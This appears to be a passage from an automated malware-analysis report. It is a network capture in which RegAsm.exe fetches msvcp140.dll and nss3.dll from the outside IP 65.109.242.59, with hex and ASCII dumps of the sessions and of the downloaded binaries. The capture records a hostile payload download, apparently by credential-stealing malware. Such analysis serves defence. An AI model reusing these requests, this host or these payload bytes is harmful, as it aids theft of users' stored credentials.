                                                                                  2024-05-24 15:47:14 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                                  Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                                  2024-05-24 15:47:14 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                                  Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                                  2024-05-24 15:47:14 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                                  Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                                  2024-05-24 15:47:14 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                                  Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.64973065.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:15 UTC174OUTGET /msvcp140.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:16 UTC246INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:16 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 450024
                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                  Connection: close
                                                                                  ETag: "6315a9f4-6dde8"
                                                                                  Accept-Ranges: bytes
                                                                                  2024-05-24 15:47:16 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                  2024-05-24 15:47:16 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                                  Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
                                                                                  2024-05-24 15:47:16 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                                  Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                                  2024-05-24 15:47:16 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                                  Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                                                  2024-05-24 15:47:16 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                                  Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                                                  2024-05-24 15:47:16 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                                  Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                                                  2024-05-24 15:47:16 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                                  Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                                  2024-05-24 15:47:16 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                                  Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                                  2024-05-24 15:47:16 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                                  Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                                  2024-05-24 15:47:16 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                                  Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.64973165.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:17 UTC170OUTGET /nss3.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:18 UTC248INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:17 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 2046288
                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                  Connection: close
                                                                                  ETag: "6315a9f4-1f3950"
                                                                                  Accept-Ranges: bytes
                                                                                  2024-05-24 15:47:18 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                  2024-05-24 15:47:18 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                                                  Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                                                  2024-05-24 15:47:18 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                                                  Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                  2024-05-24 15:47:18 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                                                  Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
                                                                                  2024-05-24 15:47:18 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                                  Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                                                  2024-05-24 15:47:18 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
